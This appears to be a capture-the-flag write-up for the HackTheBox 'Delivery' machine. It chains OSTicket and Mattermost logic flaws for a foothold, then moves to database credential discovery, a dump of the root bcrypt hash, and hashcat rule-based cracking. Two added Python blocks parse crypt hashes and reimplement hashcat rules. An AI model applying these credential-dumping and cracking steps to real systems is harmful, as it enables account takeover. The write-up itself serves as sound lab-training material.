Delivery (Easy)
{"author": ["ret2basic"]}

Summary

Delivery is a beginner-friendly box that does not require many technical skills to solve. The foothold is about chaining logic flaws between OSTicket and Mattermost. The privesc is a hashcat rule-based attack, based on a hint obtained while getting the foothold.

Nmap

Nmap

Enumeration

Port 80

The "Contact Us" page has two links:
Contact Us
To access these two links, edit /etc/hosts:
```
# HackTheBox
10.129.127.121 delivery.htb
10.129.127.121 helpdesk.delivery.htb
```

Foothold: Chaining Logic Flaws

In summary, the chain is:
1. Create a ticket on OSTicket and get a @delivery.htb email address
2. Register an account on Mattermost using the @delivery.htb email address
3. Go back to OSTicket and abuse the "Check Ticket Status" feature to get the activation link from Mattermost
Grab the activation link:
Activation link
Enter Mattermost:
Mattermost
Here we learn that the credential is maildeliverer:Youve_G0t_Mail!. The comment on hashcat is the hint for privesc.
Log in as the maildeliverer user through SSH:
maildeliverer

Privesc: hashcat Rule-based Attack

Search for Mattermost directory:
```
$ find / -name mattermost 2>/dev/null
/opt/mattermost
/opt/mattermost/bin/mattermost
/var/lib/mysql/mattermost
```
In /opt/mattermost/config/config.json, we find the SQL credential mmuser:Crack_The_MM_Admin_PW:
config.json
The password itself is also a hint. Log in as mmuser through mysql:
```
$ mysql -u mmuser -p
```
The Users table from the mattermost database contains usernames and passwords:
Database
Dump the password of root:
```
MariaDB [mattermost]> SELECT Password from Users where Username="root";
+--------------------------------------------------------------+
| Password                                                     |
+--------------------------------------------------------------+
| $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+--------------------------------------------------------------+
1 row in set (0.001 sec)
```
Identify hash type:
Hash analyzer
bcrypt hashes correspond to hash mode 3200 in hashcat:
bcrypt
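As an added illustration (not part of the original writeup), the following Python snippet parses a modular-crypt-format hash such as the one dumped above into its fields and maps the prefix to the hashcat mode. It goes a little beyond the single hash on the page by also recognising the md5crypt, sha256crypt and sha512crypt prefixes. The function names `parse_crypt_hash` and the `MCF_PREFIX_TO_MODE` table are my own; the sha512crypt sample in the usage is constructed.

```python
import re

# Modular-crypt prefixes -> hashcat hash-mode numbers (bcrypt, mode 3200, is the one on this box).
MCF_PREFIX_TO_MODE = {
    "1": 500,     # md5crypt
    "5": 7400,    # sha256crypt
    "6": 1800,    # sha512crypt
    "2a": 3200,   # bcrypt; hashcat mode 3200 covers the $2a$/$2b$/$2x$/$2y$ variants
    "2b": 3200,
    "2x": 3200,
    "2y": 3200,
}

# bcrypt layout: $2<v>$<cost>$<22-char salt><31-char digest>, alphabet ./A-Za-z0-9
BCRYPT_RE = re.compile(r"^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")
# md5crypt / sha256crypt / sha512crypt layout: $<id>$[rounds=N$]<salt>$<digest>
# (the optional rounds= field only appears with $5$ and $6$)
SHACRYPT_RE = re.compile(r"^\$([156])\$(?:rounds=(\d+)\$)?([^$]{1,16})\$([./A-Za-z0-9]+)$")


def parse_crypt_hash(h):
    """Return a dict describing a modular-crypt hash, or None if it is not a format we recognise."""
    h = h.strip()
    m = BCRYPT_RE.match(h)
    if m:
        version, cost, salt, digest = m.groups()
        cost = int(cost)
        return {
            "algorithm": "bcrypt",
            "version": version,
            "cost": cost,
            "rounds": 2 ** cost,  # bcrypt work factor: 2^cost key-expansion rounds per guess
            "salt": salt,
            "digest": digest,
            "hashcat_mode": MCF_PREFIX_TO_MODE[version],
        }
    m = SHACRYPT_RE.match(h)
    if m:
        ident, rounds, salt, digest = m.groups()
        name = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}[ident]
        # md5crypt always runs 1000 iterations; sha*crypt default to 5000 unless rounds= is set
        default_rounds = 1000 if ident == "1" else 5000
        return {
            "algorithm": name,
            "version": ident,
            "cost": None,
            "rounds": int(rounds) if rounds else default_rounds,
            "salt": salt,
            "digest": digest,
            "hashcat_mode": MCF_PREFIX_TO_MODE[ident],
        }
    return None


if __name__ == "__main__":
    # The root hash dumped from the Mattermost Users table above.
    info = parse_crypt_hash("$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO")
    print(f"{info['algorithm']} cost={info['cost']} ({info['rounds']} rounds) -> hashcat -m {info['hashcat_mode']}")
    # Constructed sha512crypt sample with an explicit rounds= field.
    print(parse_crypt_hash("$6$rounds=10000$saltsalt$" + "a" * 86))
```

The cost field is the defender's lever here: at cost 10 every guess costs 1024 bcrypt rounds, which is why the attack on this box leans on a one-word wordlist plus rules rather than on raw brute force.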
Remember the hint from the Mattermost comment? Here we should use PleaseSubscribe! as the wordlist and conduct a hashcat rule-based attack. The hashcat documentation says:
The rule-based attack is one of the most complicated of all the attack modes. The reason for this is very simple. The rule-based attack is like a programming language designed for password candidate generation. It has functions to modify, cut or extend words and has conditional operators to skip some, etc. That makes it the most flexible, accurate and efficient attack.
This idea is very similar to mutation in fuzzing.
The hashcat rules are located in /usr/share/hashcat/rules. For this box, we use best64.rule:
```
$ echo '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > hash.txt
$ echo 'PleaseSubscribe!' > wordlist.txt
$ hashcat -a 0 -m 3200 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule -o password.txt
```
The flags in the hashcat command represent:
- -a 0: set attack mode to "dictionary attack"
- -m 3200: set hash type to bcrypt
- -r /usr/share/hashcat/rules/best64.rule: use best64.rule to conduct the rule-based attack
- -o password.txt: save the cracked result to password.txt
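To make the "mutation" idea concrete, here is an added example (not hashcat's code and not part of the original writeup): a small Python reimplementation of a subset of hashcat's rule functions in best64.rule syntax, applied to the one-word wordlist from this box. The rule list is a constructed handful of lines, not the real best64.rule, and the names `apply_rule`, `generate_candidates` and `is_rule_derived` are my own. The same engine is then used the way a defender would: as a password-policy check that rejects a proposed password when it is only a trivial mutation of a phrase already known to be weak.

```python
# Constructed subset of hashcat rule lines in best64.rule syntax. This is NOT the full
# best64.rule shipped with hashcat, just enough to show how each function mutates a word.
SAMPLE_RULES = [
    ":",         # keep the word unchanged
    "l",         # lowercase everything
    "u",         # uppercase everything
    "c",         # capitalise the first letter, lowercase the rest
    "t",         # toggle the case of every character
    "r",         # reverse
    "d",         # duplicate the word
    "f",         # reflect: append the reversed word
    "{",         # rotate left
    "}",         # rotate right
    "[",         # delete the first character
    "]",         # delete the last character
    "$1",        # append '1'
    "$1 $2 $3",  # append '123' (functions on one line apply in sequence)
    "^1",        # prepend '1'
    "sa4 se3",   # leetspeak: a -> 4, then e -> 3
    "D3",        # delete the character at position 3 (0-based, so the 4th character)
]

# Number of argument characters each supported rule function consumes.
_ARGC = {"$": 1, "^": 1, "s": 2, "D": 1, "T": 1}


def _pos(ch):
    """Decode a hashcat position argument: 0-9, then A-Z for 10-35."""
    return int(ch) if ch.isdigit() else ord(ch.upper()) - ord("A") + 10


def tokenize(rule_line):
    """Split one rule line into function tokens, each carrying its fixed-length arguments."""
    tokens, i = [], 0
    while i < len(rule_line):
        ch = rule_line[i]
        if ch == " ":            # separator between functions
            i += 1
            continue
        n = _ARGC.get(ch, 0)
        tokens.append(rule_line[i:i + 1 + n])
        i += 1 + n
    return tokens


def apply_rule(word, rule_line):
    """Apply every function on a rule line, left to right, and return the candidate."""
    w = word
    for tok in tokenize(rule_line):
        f, a = tok[0], tok[1:]
        if f == ":":
            pass
        elif f == "l":
            w = w.lower()
        elif f == "u":
            w = w.upper()
        elif f == "c":
            w = w[:1].upper() + w[1:].lower()
        elif f == "t":
            w = w.swapcase()
        elif f == "r":
            w = w[::-1]
        elif f == "d":
            w = w + w
        elif f == "f":
            w = w + w[::-1]
        elif f == "{":
            w = w[1:] + w[:1]
        elif f == "}":
            w = w[-1:] + w[:-1]
        elif f == "[":
            w = w[1:]
        elif f == "]":
            w = w[:-1]
        elif f == "$":
            w = w + a
        elif f == "^":
            w = a + w
        elif f == "s":
            w = w.replace(a[0], a[1])
        elif f == "D":
            p = _pos(a)
            # Simplification: an out-of-range position leaves the word unchanged here.
            if p < len(w):
                w = w[:p] + w[p + 1:]
        elif f == "T":
            p = _pos(a)
            if p < len(w):
                w = w[:p] + w[p].swapcase() + w[p + 1:]
        else:
            raise ValueError(f"unsupported rule function {f!r} in {rule_line!r}")
    return w


def generate_candidates(words, rules):
    """Expand a wordlist with rules the way `hashcat -a 0 -r` does, de-duplicated in order."""
    seen, out = set(), []
    for word in words:
        for rule in rules:
            cand = apply_rule(word, rule)
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def is_rule_derived(password, base_words, rules=SAMPLE_RULES):
    """Defensive use: True if the password is only a rule mutation of a known weak phrase."""
    return password in generate_candidates(base_words, rules)


if __name__ == "__main__":
    for cand in generate_candidates(["PleaseSubscribe!"], SAMPLE_RULES):
        print(cand)
    print(is_rule_derived("PleaseSubscribe!123", ["PleaseSubscribe!"]))
```

Each rule line multiplies the wordlist, so a single leaked phrase plus best64.rule (77 lines) yields dozens of candidates at the cost of one dictionary pass, which is the whole reason the hint in the Mattermost comment is enough. The full hashcat rule set has more functions and stricter rejection rules than this subset; the engine above is an educational approximation, not a replacement for hashcat.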
Once the password is cracked, switch to the root user:
root